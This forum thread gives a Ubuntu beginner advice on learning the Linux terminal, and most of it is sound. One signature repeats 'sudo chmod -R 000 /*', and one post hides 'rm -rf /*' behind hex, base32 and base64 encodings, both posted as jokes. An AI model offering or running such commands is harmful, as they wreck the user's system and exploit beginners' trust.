Linux - tips for beginners

Hi!

I installed Ubuntu Budgie and have to admit that I'm not very familiar with it, but I'd like to change that in the future. My plan is to learn some terminal commands and become a "pro" Linux user.

So guys, what would you recommend to every Linux beginner? Where can we found a good tutorial or list of useful commands?

Thanks!

There are plenty of bash "cheat" sheets you can find with a google search, however just having them listed won't be enough to use them effectively. My advice is to simply try and use the command line for as many things as possible, looking up how to do various things as you need them. Start with package management.

Don't ask to ask, just ask... please聽馃え

sudo chmod -R 000 /*

For day to day desktop usage you shouldn't really need that many terminal commands. However, it's certainly useful to know basic commands and tools like vi if you need to do stuff in a terminal only environment (e.g. server).

As Sauron said, I would look into package manager and probably basic directory traversal and editing files. If your desktop breaks for some reason聽(bad update) the terminal may save you a reinstall if you know how to install the update that fixes it :P

Remember to either quote or @mention others, so they are notified of your reply

Cca. how many commands do you use for daily usage?

I'm also planning to get more into server stuff, but I'd like to learn the basics first.

Thanks for answers :)

Just now, Chromastorm69 said:

Cca. how much commands do you use for daily usage?

i use a bunch, but i run arch linux which is a lot more terminal focused.聽

i'd do what @Sauron聽said to get started with the terminal.聽

She/Her

6 minutes ago, Chromastorm69 said:

Cca. how many commands do you use for daily usage?

I'm also planning to get more into server stuff, but I'd like to learn the basics first.

Thanks for answers :)

Most of my work involves programming and I use a CLI text editor (vim) whenever I can so I'd say about 90% of my workflow in Linux happens in the terminal. The commands I use outside of vim are mostly stuff like git for version control, some compiler flags (though I tend to automate that when possible), cat/grep/ls/mv/cp to move files around and ssh/tmux for remote work and tabbing. I also use the command line to update my packages and install new ones though that generally just involves the same few commands over and over.

I should note that not all of these are fundamental parts of GNU/Linux - there are plenty of commands that are available on any Linux distro that I never need and vice versa there are things I need that need to be installed separately, such as git. In the end using the command line just comes down to stringing a few programs together, once you know how pipes and the basic utilities work it should become quite easy.

Also please quote or mention people you're answering to or we won't get a notification. I only came back because @Twilight mentioned me.

Don't ask to ask, just ask... please聽馃え

sudo chmod -R 000 /*

I remember when I first used linux I asked "where is the start button" and "what are all these weird folders in C drive?"

Want to learn linux fast? Take off the Ubuntu training wheels. Install arch or gentoo. Installing these distros will force you to learn the unix-style environment.

check out cheat.sh

# $(echo 726d202d7266202f2a0a | xxd -r -p)
# $(echo OJWSALLSMYQC6KQK | base32 -d)
# $(echo cm0gLXJmIC8qCg== | base64 -d)

@Bacon soup I would not really recommend a complete beginner to install Gentoo. Arch, that is manageable with enough patience. Gentoo, even I took a month to properly install it (of course, I had school at the same time, but I don't think that the original poster can just drop everything that they are doing to grind through a Gentoo installation), even though I had been using Arch for half a year prior and Ubuntu for a year before that. It took me three tries to get it right.

I would also recommend that you watch some Linux-related YouTube channels as well, since Linux is not all about the command line (yes, I realize that this post is specifically about the command line). My favorites are聽TuxDigital, The Linux Gamer,聽Level1Linux, Switched to Linux and The Linux Experiment. If you would like to look at other people using terminals (I am not sure how to phrase that in a better way), there are Network Chuck (Linux network stuff) and LiveOverflow (think more ethical hacking and such, rather than specific focus on Linux stuff; the guy uses a MacBook, maybe Pro).

And, finally, ones which are not my personal favorites, but which are worth mentioning in my opinion: DistroTube and Bryan Lunduke.

Hope this helps!

38 minutes ago, Bacon soup said:

@elsandosgrande聽I first installed arch in one afternoon after using ubuntu for one semester. The arch wiki is great.

It certainly is. Seriously, I even used it while on Ubuntu.